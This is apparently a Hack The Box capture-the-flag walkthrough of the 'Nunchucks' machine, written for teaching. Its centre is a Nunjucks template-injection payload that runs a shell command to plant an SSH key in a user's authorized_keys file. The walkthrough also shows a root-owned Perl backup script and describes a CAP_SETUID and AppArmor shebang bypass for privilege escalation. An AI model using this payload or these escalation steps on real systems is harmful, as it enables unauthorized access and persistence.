Only 3 Ports are opened and we can see a DNS name nunchucks.htb. So add our /etc/hosts
echo 10.10.11.122 nunchucks.htb | sudo tee -a /etc/hosts
Web
I tried directory bruteforce but noting interesting. There is also a signup page which is currently closed. So noting much we can do. Let's find vhosts for this.
Note: if you copy from original website, don't forget to esacpe double quote.
Now we get the content of /etc/passwd .
Getting User David
I generate ssh-key with ssh-keygen in my localhost.
┌─[sheinn101@parrot]─[~/htb/nunchucks/ssh]
└──╼ [??]$ ssh-keygen -f david
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in david
Your public key has been saved in david.pub
The key fingerprint is:
SHA256:zhOVx8gBnLp4OWrXr3ErJzzFxCnmWguQqm/jIRMpSOk sheinn101@parrot
The key's randomart image is:
+---[RSA 3072]----+
| ..o. |
| . o. = |
| o . . .=.o |
|+. o . o.+. |
|=E . o =S+ |
|... . *oo.o |
|o.. o B=o. |
|.oo.o o B+.. |
| +oo . .Bo |
+----[SHA256]-----+
Put it our ssh public key to /home/david/.ssh/authorized_keys.
{"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('echo "YOUR SSH PUBLIC KEY" > /home/david/.ssh/authorized_keys')\")()}}@gmail.com"}
And then we can login with ssh.
┌─[sheinn101@parrot]─[~/htb/nunchucks/ssh]
└──╼ [??]$ ssh -i david david@10.10.11.122
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-86-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 8 Nov 05:50:27 UTC 2021
System load: 0.0 Processes: 230
Usage of /: 48.8% of 6.82GB Users logged in: 0
Memory usage: 48% IPv4 address for ens160: 10.10.11.122
Swap usage: 0%
10 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Fri Oct 22 19:09:52 2021 from 10.10.14.6
david@nunchucks:~$ ls
user.txt
david@nunchucks:~$ cat user.txt
d5beec8da1********65e4f46a2a6a
david@nunchucks:~$
Privilege Escalaption
After some enumerating, there is some interesting file in /opt directory
david@nunchucks:/opt$ ls -al
total 16
drwxr-xr-x 3 root root 4096 Oct 28 17:03 .
drwxr-xr-x 19 root root 4096 Oct 28 17:03 ..
-rwxr-xr-x 1 root root 838 Sep 1 12:53 backup.pl
drwxr-xr-x 2 root root 4096 Oct 28 17:03 web_backups
david@nunchucks:/opt$
backup.pl
#!/usr/bin/perl
use strict;
use POSIX qw(strftime);
use DBI;
use POSIX qw(setuid);
POSIX::setuid(0);
my $tmpdir = "/tmp";
my $backup_main = '/var/www';
my $now = strftime("%Y-%m-%d-%s", localtime);
my $tmpbdir = "$tmpdir/backup_$now";
sub printlog
{
print "[", strftime("%D %T", localtime), "] $_[0]\n";
}
sub archive
{
printlog "Archiving...";
system("/usr/bin/tar -zcf $tmpbdir/backup_$now.tar $backup_main/* 2>/dev/null");
printlog "Backup complete in $tmpbdir/backup_$now.tar";
}
if ($> != 0) {
die "You must run this script as root.\n";
}
printlog "Backup starts.";
mkdir($tmpbdir);
&archive;
printlog "Moving $tmpbdir/backup_$now to /opt/web_backups";
system("/usr/bin/mv $tmpbdir/backup_$now.tar /opt/web_backups/");
printlog "Removing temporary directory";
rmdir($tmpbdir);
printlog "Completed";
This script is seem like to backup files into web_backups directory which is owned by root.
It' s also using POSIX::setuid(0); to run as root but It must be SUID or capability.
As a linpeas output ,we can see it has CAP_SETUID.
CAP_SETUID is granted to programs running as root or those running as a non-root user that have been explicitly given the CAP_SETUID runtime capability.It is often preferable to use Linux runtime capabilities rather than file capabilities, since using file capabilities to run a program with elevated privileges opens up possible security holes since any user with access to the file can exec() that program to gain the elevated privileges.
You can also check wit this command : getcap -r / 2>/dev/null
This is weird. I tried to search on Google and I found an Article about this. If a script including the shebang of the restricted application is used, then the script will not be allocated the same restrictions and will be executed as shown in the link. Knowing that we can execute scripts with the shebang and they won't apply the AppArmor profile to the script. That's it.
